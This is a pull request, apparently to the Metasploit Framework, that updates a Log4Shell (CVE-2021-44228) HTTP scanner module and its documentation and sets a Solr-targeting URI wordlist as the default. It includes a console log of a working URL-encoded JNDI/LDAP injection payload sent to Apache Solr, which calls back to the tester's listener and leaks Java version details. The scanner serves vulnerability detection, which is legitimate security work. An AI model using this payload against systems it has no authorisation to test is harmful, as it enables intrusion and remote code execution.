### PR TITLE
Update log4shell documentation and default URI_FILE wordlist for scanning

### DIFF
--- a/documentation/modules/auxiliary/scanner/http/log4shell_scanner.md
+++ b/documentation/modules/auxiliary/scanner/http/log4shell_scanner.md
@@ -2,7 +2,7 @@
 This module will scan an HTTP end point for the Log4Shell vulnerability by injecting a format message that will
 trigger an LDAP connection to Metasploit. This module is a generic scanner and is only capable of identifying
 instances that are vulnerable via one of the pre-determined HTTP request injection points. These points include
-HTTP headers and the HTTP request path. Additinally URI paths for common, known-vulnerable applications are included
+HTTP headers and the HTTP request path. URI paths for common, known-vulnerable applications are included
 in the `data/exploits/CVE-2021-44228/http_uris.txt` data file.
 
 This module has been successfully tested with:
@@ -88,4 +88,19 @@ msf6 auxiliary(scanner/http/log4shell_scanner) > run
 [*] Auxiliary module execution completed
 msf6 auxiliary(scanner/http/log4shell_scanner) > 
 
+```
+
+### Apache Solr
+
+Apache Solr is trivially exploitable by a remote and unauthenticated attacker when in its default configuration:
+
+```
+msf6 > use auxiliary/scanner/http/log4shell_scanner
+msf6 auxiliary(scanner/http/log4shell_scanner) > run http://10.10.235.209:8983/ srvhost=10.9.4.245
+
+[*] Started service listener on 10.9.4.245:389
+[+] 10.10.235.209:8983    - Log4Shell found via /solr/admin/cores?action=CREATE&wt=json&name=%24%7bjndi%3aldap%3a/10.9.4.245%3a389/vslscuy7m6q9pgfc18h/%24%7bsys%3ajava.vendor%7d_%24%7bsys%3ajava.version%7d%7d (java: Oracle Corporation_1.8.0_181)
+[*] Scanned 1 of 1 hosts (100% complete)
+[*] Sleeping 30 seconds for any last LDAP connections
+[*] Auxiliary module execution completed
 ```

--- a/modules/auxiliary/scanner/http/log4shell_scanner.rb
+++ b/modules/auxiliary/scanner/http/log4shell_scanner.rb
@@ -13,10 +13,16 @@ class MetasploitModule < Msf::Auxiliary
     super(
       'Name' => 'Log4Shell HTTP Scanner',
       'Description' => %q{
+        Versions of Apache Log4j2 impacted by CVE-2021-44228 which allow JNDI features used in configuration,
+        log messages, and parameters, do not protect against attacker controlled LDAP and other JNDI related endpoints.
+
         This module will scan an HTTP end point for the Log4Shell vulnerability by injecting a format message that will
         trigger an LDAP connection to Metasploit. This module is a generic scanner and is only capable of identifying
         instances that are vulnerable via one of the pre-determined HTTP request injection points. These points include
         HTTP headers and the HTTP request path.
+
+        Known impacted software includes Apache Struts 2, VMWare VCenter, Apache James, Apache Solr, Apache Druid,
+        Apache JSPWiki, Apache OFBiz.
       },
       'Author' => [
         'Spencer McIntyre'
@@ -41,11 +47,21 @@ class MetasploitModule < Msf::Auxiliary
     register_options([
       OptString.new('HTTP_METHOD', [ true, 'The HTTP method to use', 'GET' ]),
       OptString.new('TARGETURI', [ true, 'The URI to scan', '/']),
-      OptPath.new('HEADERS_FILE', [
-        false, 'File containing headers to check',
-        File.join(Msf::Config.data_directory, 'exploits', 'CVE-2021-44228', 'http_headers.txt')
-      ]),
-      OptPath.new('URIS_FILE', [ false, 'File containing additional URIs to check' ]),
+      OptPath.new(
+        'HEADERS_FILE',
+        [
+          false,
+          'File containing headers to check',
+          File.join(Msf::Config.data_directory, 'exploits', 'CVE-2021-44228', 'http_headers.txt')
+        ]
+      ),
+      OptPath.new(
+        'URIS_FILE',
+        [
+          false,
+          'File containing additional URIs to check',
+          File.join(Msf::Config.data_directory, 'exploits', 'CVE-2021-44228', 'http_uris.txt')
+        ]),
       OptInt.new('LDAP_TIMEOUT', [ true, 'Time in seconds to wait to receive LDAP connections', 30 ])
     ])
   end


### PR DESCRIPTION
Small tweaks to https://github.com/rapid7/metasploit-framework/pull/15958. Improving documentation to improve search results in msfconsole, and defaulting the URI_FILE wordlist to find Apache Solr targets.

## Verification

Tested against Apache Solr:

```
msf6 > use auxiliary/scanner/http/log4shell_scanner
msf6 auxiliary(scanner/http/log4shell_scanner) > run http://10.10.235.209:8983/ srvhost=10.9.4.245

[*] Started service listener on 10.9.4.245:389
[+] 10.10.235.209:8983    - Log4Shell found via /solr/admin/cores?action=CREATE&wt=json&name=%24%7bjndi%3aldap%3a/10.9.4.245%3a389/vslscuy7m6q9pgfc18h/%24%7bsys%3ajava.vendor%7d_%24%7bsys%3ajava.version%7d%7d (java: Oracle Corporation_1.8.0_181)
[*] Scanned 1 of 1 hosts (100% complete)
[*] Sleeping 30 seconds for any last LDAP connections
[*] Auxiliary module execution completed
```
